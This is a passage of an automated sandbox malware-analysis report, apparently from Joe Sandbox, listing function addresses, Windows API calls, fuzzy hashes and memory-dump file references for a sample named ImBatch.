Part of subcall function 1080A510: lstrlenW.KERNEL32(?,?,00000000,00000105,00000000,1080A6AF,?,1080FC30,?,00000000), ref: 1080A597

LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,1080A3BA,?,?,00000000), ref: 1080A38D

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: FileLibraryLoadModuleNamelstrcpynlstrlen
String ID:
API String ID: 2912033995-0
Opcode ID: 2bbea2c40f57e74d2907510c66d680966e5c2ba575c3918ad43da58084d53c2b
Instruction ID: 1246d19bb23aa42bc721a866b8d33b62b65d77373ad00b005d1b5dd08c2b9e22
Opcode Fuzzy Hash: 2bbea2c40f57e74d2907510c66d680966e5c2ba575c3918ad43da58084d53c2b
Instruction Fuzzy Hash: 6E111C74A4821C9BDB10DB64CC96BDEB3B9EB08300F5145B6E508A2294EA746F84CAA5

Uniqueness

Uniqueness Score: -1.00%

Function 1084487C Relevance: 3.0, APIs: 2, Instructions: 16
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowLongW.USER32 ref: 10844883
DestroyWindow.USER32(?,?,000000FC,00000000,00000000,10876A80,00000000,10876A9B,?,109F83CC,00000000,?,10876AB5,109F8A06,Rich Text Format,HTML Format), ref: 1084488B

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: Window$DestroyLong
String ID:
API String ID: 2871862000-0
Opcode ID: f4ae5b055bbe5e037dcf3f9879f0c9d03655de8ae536175904e3dda54e929463
Instruction ID: 21a6c087f9425c1f4579975c59e8721989b78f1cce1a2a9bc1ef38f3d8a02905
Opcode Fuzzy Hash: f4ae5b055bbe5e037dcf3f9879f0c9d03655de8ae536175904e3dda54e929463
Instruction Fuzzy Hash: 9BC08C0960EB3826A71039BC2CC19FF1A8CCD030F23B21332F910D6296DE081D0002A5

Uniqueness

Uniqueness Score: -1.00%

Function 108041AC Relevance: 2.6, APIs: 2, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualFree.KERNEL32(10A9BA2C,00000000,00008000), ref: 108041CA
VirtualFree.KERNEL32(10A9DAD0,00000000,00008000), ref: 10804227

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: b839b3f66631b42a8ca3ade2b1470d86c393cd29ff45ce682c8f44ca23719678
Instruction ID: 0d893c145c93e8cba75c6a3e2f14540d0a561c3529356c8489c52df3349aa4bb
Opcode Fuzzy Hash: b839b3f66631b42a8ca3ade2b1470d86c393cd29ff45ce682c8f44ca23719678
Instruction Fuzzy Hash: 5611C0B13456009FC3148F489D80B15BBE5EB88750F66C06DE2098F749DA75EC02CB94

Uniqueness

Uniqueness Score: -1.00%

Function 10A58D08 Relevance: 1.6, APIs: 1, Instructions: 87COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,-00000002,?,?,?,?,10A59E9E), ref: 10A58DD2

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 3d7d4f2f0fbb6d8764dc46b50fcc66e74b4270785b1f73c5bea85516be427dc9
Instruction ID: 23f5b57c0b55e0f60fd536ece2c707c1e6b66c8ab23d8c7847646b3a2ccced86
Opcode Fuzzy Hash: 3d7d4f2f0fbb6d8764dc46b50fcc66e74b4270785b1f73c5bea85516be427dc9
Instruction Fuzzy Hash: 0B314A313017008BC765CE28C584BD7B7E9FF5A340F048869E9AAD72A1CB30BC49CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10842468 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32(?,00000000,10842506,?,109F83CC,00000000,00000000,?,10842D83,10A02E44,00000064,109F83CC,00000000,10A02D8C,109F83CC,00000001), ref: 1084249D

Part of subcall function 1080B018: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 1080B05D

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: LoadResumeStringThread
String ID:
API String ID: 2522707468-0
Opcode ID: 26b390604a60f17a1572fc670ba584bde9778e64185860582d3365c249d01c8b
Instruction ID: c7b3c0b4609f1a2e4a64a296fc7124aea0e32d13231234c347627c955488142b
Opcode Fuzzy Hash: 26b390604a60f17a1572fc670ba584bde9778e64185860582d3365c249d01c8b
Instruction Fuzzy Hash: 2611ED38A0C248DFEB01CF68CCE1B597BA8EB49314FA184A5E8049B385C675FD44CB71

Uniqueness

Uniqueness Score: -1.00%

Function 1080DEDC Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32 ref: 1080DF1B

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 8e64869cad9ebd491d0db67b210395efc06e91ad90b013bd35d0deeb334d7e1c
Instruction ID: cad672076fde5983cb68d1d54d165245d8564ffd1a8d6151cb87a1384b1f092f
Opcode Fuzzy Hash: 8e64869cad9ebd491d0db67b210395efc06e91ad90b013bd35d0deeb334d7e1c
Instruction Fuzzy Hash: EFF09DB6604118BF9B84DE9DDC81EDB77ECEB9D2A0B054125FA0CD7200D630ED108BA4

Uniqueness

Uniqueness Score: -1.00%

Function 10806848 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32 ref: 10806898

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 35eb1fdd6ef761ad8042932e2898bd4877039b1e22e96d91712bcb3eb3f88634
Instruction ID: 9aa8fad2e32810dd1b22321f3c1a6d7e9ad9fc8fbf5fac670b8786ec9cbbcf05
Opcode Fuzzy Hash: 35eb1fdd6ef761ad8042932e2898bd4877039b1e22e96d91712bcb3eb3f88634
Instruction Fuzzy Hash: DDF01D76608114AFD304DF8DDC84B5BB7FCEB89764F20C16AF508C7265CAB1AD5687A0

Uniqueness

Uniqueness Score: -1.00%

Function 108094A4 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,0000020A), ref: 108094C2

Part of subcall function 1080A300: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,1080A3BA,?,?,00000000), ref: 1080A33C
Part of subcall function 1080A300: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,1080A3BA,?,?,00000000), ref: 1080A38D

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: FileModuleName$LibraryLoad
String ID:
API String ID: 4113206344-0
Opcode ID: ceeb4d38f3249bd511526ddb8aef53e7b93af0284fac12449261a2c3062154f2
Instruction ID: 0f17aeac0e25695604c5857c0695a8a4456fb0029c8b99cf84282225717fd611
Opcode Fuzzy Hash: ceeb4d38f3249bd511526ddb8aef53e7b93af0284fac12449261a2c3062154f2
Instruction Fuzzy Hash: 39E0E5B5A053209BCB14DEACCCC5A4677E8EB08754F054AA1ED68CF34AE371DD248BE5

Uniqueness

Uniqueness Score: -1.00%

Function 108C6F88 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(108C68AC,000000B9,10874FE4,00000001,10876B47,00000000,?,10A59319,00000001,?), ref: 108C6F9B

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: e57a6e2b36817d7caf79ce4a269a9cb39845df9a478d900ebba0d96516e372ca
Instruction ID: ad61f92c108e2a915f08910d016dbab700243d6b992093328113cac24c453d34
Opcode Fuzzy Hash: e57a6e2b36817d7caf79ce4a269a9cb39845df9a478d900ebba0d96516e372ca
Instruction Fuzzy Hash: 95E0B6B1214B608FE361CA69C485B93B7F8EF49254F04896DEACAC7752CB71BC44CB90

Uniqueness

Uniqueness Score: -1.00%

Function 108C6FBC Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(00000029,108C830C,10874FE4,00000001,10876B53,00000000,?,10A59319,00000001,?), ref: 108C6FCF

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 0f44e213433121299d26c86ca3d431a75830f4a01dc22381f4220e09f86e05d1
Instruction ID: d65c9465d8585c9d7ba29d756ae449b315ba43892843dfab71e6dfedbf37bc1b
Opcode Fuzzy Hash: 0f44e213433121299d26c86ca3d431a75830f4a01dc22381f4220e09f86e05d1
Instruction Fuzzy Hash: 04E01270200B608FE361CA28C484B93BBF8EF49204F00896DEACAC7651CB21BC08CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10842514 Relevance: 1.5, APIs: 1, Instructions: 18threadCOMMON

Download Yara Rule

APIs

SetThreadPriority.KERNEL32(?,83C607EB,00000000,109F83CC,10A02E35,00000064,109F83CC,00000000,10A02D8C,109F83CC,00000001,10A0406F,00000000,?,10A5941C), ref: 10842529

Part of subcall function 108423EC: GetLastError.KERNEL32(00000004,1084253B,?,83C607EB,00000000,109F83CC,10A02E35,00000064,109F83CC,00000000,10A02D8C,109F83CC,00000001,10A0406F,00000000,?), ref: 108423F3

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: ErrorLastPriorityThread
String ID:
API String ID: 3452863325-0
Opcode ID: 778f6a08e7519457f97dfc0d2ed3bc90498be0d0499d6610cd431bc1ce8adb3b
Instruction ID: eb799a017987d153bd103cdd4c081530955be7295d47d9c03e40694a7332de6c
Opcode Fuzzy Hash: 778f6a08e7519457f97dfc0d2ed3bc90498be0d0499d6610cd431bc1ce8adb3b
Instruction Fuzzy Hash: 53D02272300A280FC214DAEC8CC0D5E62CCCF8C60B3008423F144C3330C22AEC0A83A0

Uniqueness

Uniqueness Score: -1.00%

Function 10802662 Relevance: 1.5, APIs: 1, Instructions: 14COMMON

